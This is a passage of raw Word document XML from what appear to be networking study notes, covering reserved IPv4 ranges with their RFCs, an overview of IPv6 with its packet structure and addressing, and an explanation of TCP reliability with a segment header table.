                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 3927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172.16.0.0/12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4"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192.0.0.0/24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Reserved (IANA)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5"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192.0.2.0/24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TEST-NET-1, Documentation and example code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6"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192.88.99.0/24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IPv6 to IPv4 relay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7" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 3068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192.168.0.0/16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8"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198.18.0.0/15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Network benchmark tests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9" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 2544</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198.51.100.0/24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TEST-NET-2, Documentation and examples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0" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 5737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203.0.113.0/24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TEST-NET-3, Documentation and examples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1" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 5737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224.0.0.0/4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Multicasts (former Class D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2" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 3171</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240.0.0.0/4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Reserved (former Class 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3" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 1700</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255.255.255.255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Broadcast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4" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 919</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00017FB7" w:rsidRDefault="00017FB7" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00F96C65" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96C65">
        <w:t>Internet Protocol version 6 (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="00D60040" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internet Protocol version 6 (IPv6) is the next-generation Internet Protocol version desi</w:t>
      </w:r>
      <w:r w:rsidR="00F96C65" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gnated as the successor to IPv4. The main reason for the development of IPv6 was to solve the problem of IPv4 address exhaustion. IPv6 has a vastly larger address space than IPv4. This results from the use of a 128-bit address, whereas IPv4 uses only 32 bits. The new address space thus supports 2</w:t>
      </w:r>
      <w:r w:rsidR="00F96C65" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidR="00F96C65" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (about 3.4×10</w:t>
      </w:r>
      <w:r w:rsidR="00F96C65" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="00F96C65" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) addresses. IPv6 also implements new features that simplify aspects of address assignment (stateless address autoconfiguration) and network renumbering (prefix and router announcements) when changing Internet connectivity providers. The IPv6 subnet size has been standardized by fixing the size of the host identifier portion of an address to 64 bits to facilitate an automatic mechanism for forming the host identifier from Link Layer media addressing information (MAC address). Network security is integrated into the design of the IPv6 architecture. Internet Protocol Security (IPsec) was originally developed for IPv6, but found widespread optional deployment first in IPv4 (into which it was back-engineered). The IPv6 specifications mandate IPsec implementation as a fundamental interoperability requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F96C65" w:rsidRDefault="00F96C65" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F96C65" w:rsidRPr="000C392B" w:rsidRDefault="00F96C65" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C392B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet Structure:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="2310"/>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="2311"/>
        <w:gridCol w:w="2311"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D85814" w:rsidTr="00D85814">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155"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4bit Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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Traffic Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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20bit Flow Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85814" w:rsidTr="00D85814">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4620" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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16bit Payload Length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311"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Next header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311"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Hop limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F96C65" w:rsidTr="00D85814">
        <w:trPr>
          <w:trHeight w:val="1125"/>
        </w:trPr>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128bit Source Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F96C65" w:rsidTr="00D85814">
        <w:trPr>
          <w:trHeight w:val="1113"/>
        </w:trPr>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128bit Destination address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F96C65" w:rsidTr="00D85814">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 xml:space="preserve">Possible </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D85814">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>xtension headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F96C65" w:rsidTr="00D85814">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Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D60040" w:rsidRDefault="00D60040" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B4650E" w:rsidRPr="00D1486B" w:rsidRDefault="00B4650E" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IPv6 specifies a new packet format, designed to minimize packet-header processing. Since the headers of IPv4 packets and IPv6 packets are significantly different, the two protocols are not interoperable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4650E" w:rsidRPr="00D1486B" w:rsidRDefault="000C392B" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Addressing</w:t>
      </w:r>
      <w:r w:rsidR="00B4650E" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4650E"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IPv6 addresses are normally written with hexadecimal digits and colon separators like 2001:db8:85a3:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:8a2e:370:7334</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, as opposed to the dot-decimal notation of the 32 bit IPv4 addresses. IPv6 addresses are typically composed of two logical parts: a 64-bit (sub-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix, and a 64-bit host part.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3"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 xml:space="preserve">IPv6 addresses are classified into three types: </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r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unicast addresses which unique</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ly identify network interfaces</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r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anycast addresses which identify a group of interfaces—mostly at different locations—for which traffi</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c flows to the nearest one</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>multicast</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses which are used to deliver one packet to many interfaces. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4650E"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Broadcast addresses are not used in IPv6. Each IPv6 address also has a 'scope', which specifies in which part of the network it is valid and unique. Some addresses have node scope or link scope; most addresses have global scope (i.e. they are unique globally).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4650E" w:rsidRDefault="00B4650E" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="000C392B" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C392B">
        <w:t>Transmission control Protocol (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="00D85814" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP provides reliable, ordered delivery of a stream of bytes from a program on one computer to another program on another computer. Among its other management tasks, TCP controls segment size, flow control, the rate at which data is exchanged, and network traffic congestion.</w:t>
      </w:r>
      <w:r w:rsidR="004746B3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to network congestion, traffic load balancing, or other unpredictable network </w:t>
      </w:r>
      <w:r w:rsidR="000C392B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, IP packets can be lost, duplicated, or delivered out of order. TCP detects these problems, requests retransmission of lost packets, rearranges out-of-order packets, and even helps minimize network congestion to reduce the occurrence of the other problems. Once the TCP receiver has finally reassembled a perfect copy of the data originally transmitted, it passes that datagram to the application program. Thus, TCP abstracts the application's communication from the underlying networking details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP is a reliable stream delivery service that guarantees delivery of a data stream sent from one host to another without duplication or losing data. Since packet transfer is not reliable, a technique known as positive acknowledgment with retransmission is used to guarantee reliability of packet transfers. This fundamental technique requires the receiver to respond with an acknowledgment message as it receives the data. The sender keeps a record of each packet it sends, and waits for acknowledgment before sending the next packet. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The sender also keeps a timer from when the packet was sent, and retransmits a packet if the timer expires. The timer is needed in case a packet gets lost or corrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP consists of a set of rules: for the protocol, that are used with the Internet Protocol, and for the IP, to send data "in a form of message units" between computers over the Internet. At the same time that IP takes care of handling the actual delivery of the data, TCP takes care of keeping track of the individual units of data</w:t>
      </w:r>
      <w:r w:rsidR="000C392B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> transmission, called </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000C392B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">segments, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a message is divided into for efficient routing through the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004746B3" w:rsidRPr="00D1486B" w:rsidRDefault="004746B3" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP Segment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04"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="214"/>
        <w:gridCol w:w="239"/>
        <w:gridCol w:w="214"/>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Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Bit 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31</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0</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Source port</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Destination port</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32</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Sequence number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64</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Acknowledgment number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96</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Data offset</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C</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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E</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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U</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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A</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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P</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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R</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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S</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>Y</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:b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F</w:t>
            </w:r>
            <w:r w:rsidRPr="004746B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>I</w:t>
            </w:r>
